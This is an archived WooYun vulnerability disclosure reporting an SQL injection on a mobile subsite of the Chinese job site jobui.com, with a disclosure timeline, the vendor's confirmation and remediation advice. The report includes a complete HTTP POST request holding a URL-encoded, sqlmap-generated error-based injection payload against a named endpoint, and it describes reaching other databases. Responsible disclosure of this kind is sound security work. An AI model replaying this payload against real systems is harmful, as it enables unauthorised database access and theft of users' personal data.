当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043025

漏洞标题:职友集分站SQL注入—跨库依然是(N百W信息泄露)

相关厂商:职友集网

漏洞作者: xiaoL

提交时间:2013-11-20 19:33

修复时间:2014-01-04 19:34

公开时间:2014-01-04 19:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-20: 厂商已经确认,细节仅向厂商公开
2013-11-30: 细节向核心白帽子及相关领域专家公开
2013-12-10: 细节向普通白帽子公开
2013-12-20: 细节向实习白帽子公开
2014-01-04: 细节向公众公开

简要描述:

分站的一处注入,不过数据库主机显然跟主站用的是一个,账号也是一个,权限也是一样。当然又是N百W信息泄露了!

详细说明:

事发地点:http://m.jobui.com/company/10483991/review/
只要是这个模板页面都一样
里面有个评论,本来是测试XSS的,可是没返回,发现一个表单。测试之......

011.png


又一处藏的很深的显错…
为了审核大大方便,送一个post包。

POST /process/ HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: m.jobui.com
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Cookie: jobui_user_passport=yk13845182002797;PHPSESSID=fb089o01l3n1naolma3f5mjvp6
Content-length: 373
Connection: close
companyID=10483991%20AND%20%28SELECT%205643%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71706d6971%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x717a6f6971%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29;-- 1&formAction=company_review_changeImpression&isMobile=ture&comment=GfuR


如果返回-3
只要增加最后一行1前面的空格就能返回了

漏洞证明:

接下来证明的事情又是SQLMAP来了
这里发现情况了…
竟然跨库了,那就和上次发现的主站的sql注入一样具有极大的危害了…
当前数据库是jobui_company 用户依然是johui
依然可以查看其他数据库的数据
小小的截一张图

013.jpg


上次看了文章觉得要保护厂商,就不列那么多了,打了码。现在知道还不迟。

修复方案:

数据库的权限分级要清楚。
一切用户输入都可能是有害的。
包括你们的程序员。

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-11-20 19:56

厂商回复:

非常感谢乌云的专业!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-05 08:23 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    - -~邮箱求sqlmap各种注入语句和测试手法